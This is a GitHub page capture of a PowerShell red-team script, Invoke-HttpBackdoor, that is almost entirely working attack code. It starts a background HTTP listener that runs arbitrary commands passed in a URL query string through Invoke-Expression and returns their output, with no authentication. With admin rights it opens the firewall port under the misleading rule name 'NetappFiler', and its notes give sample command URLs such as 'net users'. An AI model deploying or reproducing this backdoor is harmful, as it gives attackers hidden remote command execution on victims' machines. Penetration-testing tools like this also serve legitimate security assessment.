PowerShell/Invoke-HttpBackdoor.ps1 at master · obscuresec/PowerShell · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
Function Invoke-HttpBackdoor {
<#
.NAME
   Invoke-HttpBackdoor

.SYNOPSIS

    Invoke-HttpBackdoor

    Author: Chris Campbell (@obscuresec)
    License: BSD 3-Clause

.DESCRIPTION

    This function creates an HTTP backdoor on a specified port as a background job.

.LINK

    http://www.obscuresec.com/
    http://ps1.soapyfrog.com/wp-content/uploads/2007/01/httpdps1.txt

.NOTES

    To send the HttpBackdoor commands:
        http://backdoorhost/?api/settings/session=ipconfig
        http://backdoorhost/?api/settings/session=net%20users
#>
    [CmdletBinding()] Param (
        [Parameter(Position = 0)]
        [ValidateRange(1,65535)]
        [Int32]
        $Port = '8888'
    )

    $Initializer = {
        Function HttpBackdoor {
            $ListenPort = "REPLACEME0"
            $DirectoryString = 'api/settings/session'

            $HttpListenerObject = New-Object Net.HttpListener
            $ObjectPrefix = "http://*:$ListenPort/"

            Foreach ($Object in $ObjectPrefix) {
                $HttpListenerObject.Prefixes.Add($Object)
            }

            $HttpListenerObject.Start()

            $Continue = $True

            While ($Continue) {
              $ListenerContext = $HttpListenerObject.GetContext()
              $HttpResponse = $ListenerContext.Response
              $HttpResponse.Headers.Add("Content-Type","text/plain")
              $StreamWriterObject = New-Object IO.StreamWriter($HttpResponse.OutputStream,[Text.Encoding]::UTF8)
              $HttpRequest = $ListenerContext.Request
              [string] $HttpParameter = $HttpRequest.QueryString[$DirectoryString]

              Switch ($HttpParameter) {
                "logout" {$Continue = $False; Break}
                $null {$StreamWriterObject.WriteLine("HTTP Error 403: Forbidden"); Break}
                Default {
                   $Count = 0
                   Invoke-Expression $HttpParameter | Out-String -Stream | foreach {
                         $StreamWriterObject.WriteLine($_.TrimEnd())
                         $Count++
                      }

                  If ($Count -eq 0) {$StreamWriterObject.WriteLine('HTTP Error 404: Not Found')}
                }
              }

              $StreamWriterObject.Close()

            }
            $HttpListenerObject.Stop()
        }
    }

        Try {
            #Check if Firewall is on
            $FirewallStatus = (New-Object -com HNetCfg.FwMgr).localpolicy.CurrentProfile.FirewallEnabled

            #Check for admin rights
            $AdminStatus = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")

            #Firewall no admin rights
            If (($FirewallStatus -eq $True) -and ($AdminStatus -eq $False)) {
                Write-Error "Not running as admin and the firewall is on. Run with elevated credentials"
                Return
            }

            #Firewall with admin rights, open port
            If (($FirewallStatus -eq $True) -and ($AdminStatus -eq $True)) {
                $FirewallPolicyObject = New-Object -ComObject hnetcfg.fwpolicy2
                $FirewallRuleObject = New-Object -ComObject HNetCfg.FWRule
                $FirewallRuleObject.Name = 'NetappFiler'
                $FirewallRuleObject.Protocol = 6
                $FirewallRuleObject.LocalPorts = $LocalPort
                $FirewallRuleObject.Enabled = $true
                $FirewallRuleObject.Profiles = 7
                $FirewallRuleObject.Action = 1
                $FirewallPolicyObject.Rules.Add($FirewallRuleObject)
            }

            #Check if port is alread used
            $ListeningPorts = ([System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpListeners()).port
            If ($ListeningPorts -contains $Port) {
                Write-Error "Port is already in use!"
                Return
            }

            $ScriptBlock = [ScriptBlock]::Create(($Initializer -replace 'REPLACEME0', $Port))
            Start-job -InitializationScript $ScriptBlock -ScriptBlock {HttpBackdoor} | Out-Null
        }

        Catch {
            Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage
        }
}